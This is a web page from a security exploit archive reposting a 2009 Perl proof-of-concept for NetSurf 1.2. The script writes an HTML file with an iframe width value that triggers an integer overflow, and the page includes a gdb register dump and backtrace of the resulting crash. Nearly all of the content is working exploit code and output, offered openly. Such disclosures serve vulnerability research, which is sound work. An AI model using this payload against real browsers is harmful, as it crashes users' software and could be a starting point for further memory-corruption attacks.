首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetSurf version 1.2 width remote integer overflow proof of concept exploit
来源:http://jbrownsec.blogspot.com/ 作者:Brown 发布时间:2009-01-15  
#!/usr/bin/perl
# netsurf_width_intof2.pl
# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# 
# Program received signal SIGABRT, Aborted.
# [Switching to Thread 0xb6d78720 (LWP 28933)]
# 0xb804e430 in __kernel_vsyscall ()
# (gdb) i r
# eax            0x0	0
# ecx            0x7105	28933
# edx            0x6	6
# ebx            0x7105	28933
# esp            0xbfb4cfe4	0xbfb4cfe4
# ebp            0xbfb4cffc	0xbfb4cffc
# esi            0xb7532b97	-1219286121
# edi            0xb754fff4	-1219166220
# eip            0xb804e430	0xb804e430 <__kernel_vsyscall+16>
# eflags         0x206	[ PF IF ]
# cs             0x73	115
# ss             0x7b	123
# ds             0x7b	123
# es             0x7b	123
# fs             0x0	0
# gs             0x33	51
# (gdb) bt
# 0  0xb804e430 in __kernel_vsyscall ()
# 1  0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6
# 2  0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6
# 3  0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
# 4  0x080a7cdd in ?? ()
# 5  0x080a75e2 in ?? ()
# 6  0x080a747d in ?? ()
# 7  0x080ab3f0 in layout_document ()
# 8  0x0809f073 in html_reformat ()
# 9  0x080a0d95 in html_convert ()
# 10 0x0805980c in content_convert ()
# 11 0x0805cc49 in ?? ()
# 12 0x0805a6c1 in fetch_send_callback ()
# 13 0x08060c23 in ?? ()
# 14 0x0806110f in ?? ()
# 15 0x0805afe9 in fetch_poll ()
# 16 0x08088276 in gui_poll ()
# 17 0x0807fe94 in main ()
# 
# Adv Ref: netsurf_multiple_adv.txt

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n";

}

$head = "<html>" . "\n";
$trig = "<iframe src=\"test.jpg\" width=\"2147483584\">" . "\n";
#$trig = "<hr width=\"2147483584\">" . "\n";
$foot = "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetSurf version 1.2 remote mem
·NetSurf version 1.2 hspace rem
·Oracle TimesTen Remote Format
·The Cisco IOS HTTP server is v
·Oracle Secure Backup 10g exec_
·NetSurf Web Browser 1.2 Multip
·phosheezy 2.0 Remote Command E
·AAA EasyGrid ActiveX 3.51 Rem
·Joomla com_Eventing 1.6.x Blin
·Exploits 3CTftpSvc Server 2.0.
·Ciansoft PDFBuilderX 2.2 Activ
·AT-TFTP Buffer Overflow (Long
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved